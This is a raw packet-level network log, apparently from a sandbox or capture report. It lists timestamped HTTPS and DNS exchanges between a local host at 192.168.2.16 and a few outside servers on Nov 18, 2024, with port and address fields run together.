                                                                                                                                          Nov 18, 2024 06:48:32.520384073 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.520406008 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.521019936 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.521536112 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.521578074 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.521615028 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.521621943 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.521652937 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.521672964 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.522392035 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.522439003 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.522468090 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.522474051 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.522504091 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.522521973 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.523185968 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.523226023 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.523262978 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.523268938 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.523296118 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.523322105 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.523756027 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.523818970 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.523833036 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.523839951 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.523889065 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.524446011 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.524485111 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.524518967 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.524524927 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.524548054 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.524564028 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.524652958 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.524698973 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.524713993 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.524722099 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.524761915 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.525439024 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.525482893 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.525517941 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.525523901 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.525544882 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.525568962 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.526029110 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.526072025 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.526103020 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.526108980 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.526156902 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.526175976 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.608639956 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.608700991 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.608761072 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.608784914 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.608808041 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.608840942 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.609160900 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.609205008 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.609256983 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.609263897 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.609292030 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.609312057 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.609581947 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.609623909 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.609659910 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.609667063 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.609697104 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.609719992 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.610076904 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.610116959 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.610151052 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.610157013 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.610192060 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.610209942 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.610593081 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.610636950 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.610667944 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.610675097 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.610702991 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.610723972 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.611035109 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.611087084 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.611112118 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.611119032 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.611166954 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.611424923 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.611471891 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.611496925 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.611504078 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.611516953 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.611551046 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.650365114 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.650433064 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.650485992 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.650495052 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.650538921 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.724744081 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.724811077 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.724847078 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.724857092 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.724895000 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.724909067 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.725271940 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.725315094 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.725352049 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.725359917 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.725380898 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.725405931 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.725655079 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.725701094 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.725732088 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.725739002 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.725766897 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.725791931 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.726000071 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.726044893 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.726077080 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.726083994 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.726108074 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.726130009 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.726576090 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.726603031 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.726639032 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.726646900 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.726679087 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.726691961 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.727119923 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.727138042 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.727201939 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.727210999 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.727256060 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.727732897 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.727751017 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.727801085 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.727808952 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.727823973 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.727865934 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.727874041 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.727910995 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.727921009 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.727986097 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.728128910 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.728138924 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.730993986 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:32.731004953 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.731178999 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:32.731470108 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:32.731487036 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.168313980 CET44355207142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.168390036 CET44355207142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.168452024 CET55207443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:48:34.186800003 CET5293653192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:34.191627979 CET53529361.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.191745043 CET5293653192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:34.191745043 CET5293653192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:34.197834969 CET53529361.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.211812973 CET55207443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:48:34.211850882 CET44355207142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.359292030 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.359695911 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.359709978 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.361243010 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.361577988 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.361711025 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.361716986 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.361772060 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.402230024 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.665543079 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.665595055 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.665613890 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.665653944 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.665666103 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.665693998 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.665709972 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.665726900 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.665740013 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.665752888 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.666734934 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.666781902 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.666826963 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.666836977 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.666851997 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.666889906 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.783163071 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.783229113 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.783353090 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.783353090 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.783375978 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.783412933 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.784853935 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.784897089 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.784944057 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.784951925 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.784982920 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.785001993 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.785865068 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.785923004 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.785948038 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.785955906 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.785989046 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.786010981 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.786839962 CET53529361.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.787130117 CET5293653192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:34.787587881 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.787616014 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.787655115 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.787662983 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.787698030 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.787719965 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.793559074 CET53529361.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.793723106 CET5293653192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:34.900926113 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.900988102 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.901036024 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.901046038 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.901081085 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.901099920 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.901693106 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.901741982 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.901773930 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.901781082 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.901809931 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.901830912 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.902731895 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.902776957 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.902813911 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.902820110 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.902851105 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.902868986 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.903707981 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.903753042 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.903779984 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.903786898 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.903811932 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.903831959 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.904658079 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.904700994 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.904736042 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.904742002 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.904769897 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.904784918 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.906203032 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.906244993 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.906296015 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.906303883 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:34.906327963 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:34.906335115 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.018399954 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.018450022 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.018526077 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.018547058 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.018635988 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.018706083 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.018755913 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.018759966 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.018776894 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.018794060 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.018827915 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.018853903 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.019222975 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.019265890 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.019289970 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.019298077 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.019309998 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.019345999 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.019754887 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.019800901 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.019830942 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.019838095 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.019860029 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.019881010 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.025130033 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.025171995 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.025208950 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.025217056 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.025240898 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.025259972 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.025371075 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.025413036 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.025439978 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.025446892 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.025471926 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.025492907 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.135617971 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.135689974 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.135730028 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.135740042 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.135768890 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.135785103 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.135929108 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.135983944 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.135986090 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.136013031 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.136040926 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.136050940 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.136266947 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.136307001 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.136339903 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.136348009 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.136363983 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.136393070 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.136733055 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.136780977 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.136815071 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.136821985 CET4436071852.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:35.136852980 CET60718443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:35.136868000 CET60718443192.168.2.1652.223.1.163
